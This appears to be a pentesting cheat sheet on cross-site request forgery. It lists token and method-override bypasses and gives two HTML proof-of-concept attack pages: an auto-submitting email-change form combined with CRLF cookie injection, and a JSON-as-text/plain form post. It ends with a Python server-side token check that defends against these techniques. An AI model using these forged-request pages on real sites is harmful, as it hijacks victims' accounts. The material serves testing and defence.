CSRF

CSRF Checklist

  • [ ] Remove Anti-CSRF Token

  • [ ] No check for the user's Token

  • [ ] Weak Token

  • [ ] Reusable token

  • [ ] Change request method

  • [ ] Guessable Token

  • [ ] Bypass referer

  • [ ] Modifying Parameter Names => POST To GET

  • [ ] Method override via `_method` parameter or header: `https://example.com/my/dear/api/val/num?_method=PUT`, or the headers `X-HTTP-Method`, `X-HTTP-Method-Override`, `X-Method-Override`

  • [ ] Custom header token bypass

  • [ ] Test the request without the customized token and also without the custom header. Test the request with a token of exactly the same length but a different value.

  • [ ] CSRF token is verified by a cookie

```html
<html>
  <!-- CSRF Proof of Concept - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://example.com/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
      <input type="hidden" name="csrf" value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" />
      <input type="submit" value="Submit request" />
    </form>
    <!-- the CRLF-injected Set-Cookie plants the same csrf value in the victim's cookie jar;
         the form is submitted once the image request fails -->
    <img src="https://example.com/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" onerror="document.forms[0].submit();"/>
  </body>
</html>
```

💡 Note that if the CSRF token is bound to the session cookie, this attack won't work: you would have to put the victim into your own session, and you would therefore only be attacking yourself.

Content-Type change: `application/x-www-form-urlencoded`, `multipart/form-data`, `text/plain`

Example (from here) of sending JSON data as text/plain:

```html
<html>
  <body>
    <!-- enctype="text/plain" sends the body as name=value; the name and value are chosen so that
         the "=" lands inside a throwaway string and the whole body parses as one JSON object -->
    <form id="form" method="post" action="https://phpme.be.ax/" enctype="text/plain">
      <input name='{"garbageeeee":"' value='", "yep": "yep yep yep", "url": "https://webhook/"}'>
    </form>
    <script>
      form.submit();
    </script>
  </body>
</html>
```
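As an added, defender-side illustration (not code from the original page), here is a minimal server-side CSRF check that closes the items in the checklist above and the text/plain trick just shown: it binds the token to the session so an injected or attacker-minted token fails, compares in constant time, ignores method-override tricks, rejects `text/plain` bodies, and checks the `Origin` header. The request dict shape, `SERVER_KEY`, `SITE_ORIGIN` and the session ids are assumptions constructed for this example.

```python
import hashlib
import hmac
import secrets

# Server-side key and the site's own origin; both are constructed for this example.
SERVER_KEY = secrets.token_bytes(32)
SITE_ORIGIN = "https://example.com"
# Body encodings a browser form can send; text/plain is deliberately absent so the
# enctype="text/plain" JSON trick is rejected before the body is parsed.
FORM_CONTENT_TYPES = {"application/x-www-form-urlencoded", "multipart/form-data"}


def issue_token(session_id: str) -> str:
    """Derive the CSRF token from the session id. A token minted for the attacker's
    session, or planted in the victim's cookie jar via Set-Cookie, never matches."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(req: dict) -> tuple[bool, str]:
    """Check one state-changing request. `req` is a constructed dict with the keys
    method, headers, cookies and form; returns (accepted, reason)."""
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    # Decide on the request-line verb only: _method and X-HTTP-Method-Override are ignored.
    if req["method"].upper() != "POST":
        return False, "state change must be a real POST"
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if ctype not in FORM_CONTENT_TYPES:
        return False, f"unexpected Content-Type {ctype!r}"
    # Origin (falling back to Referer) as defence in depth: a cross-site form post
    # carries the attacker's origin, and a missing header is treated as cross-site.
    origin = headers.get("origin") or headers.get("referer", "")
    if origin != SITE_ORIGIN and not origin.startswith(SITE_ORIGIN + "/"):
        return False, "cross-site or missing Origin"
    session_id = req.get("cookies", {}).get("session")
    if not session_id:
        return False, "no session"
    # The token must come from the request body, never from a cookie the attacker can set.
    supplied = req.get("form", {}).get("csrf")
    if not supplied:
        return False, "missing token"
    # Constant-time compare: a same-length but different token still fails here.
    if not hmac.compare_digest(supplied, issue_token(session_id)):
        return False, "token does not belong to this session"
    return True, "ok"
```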
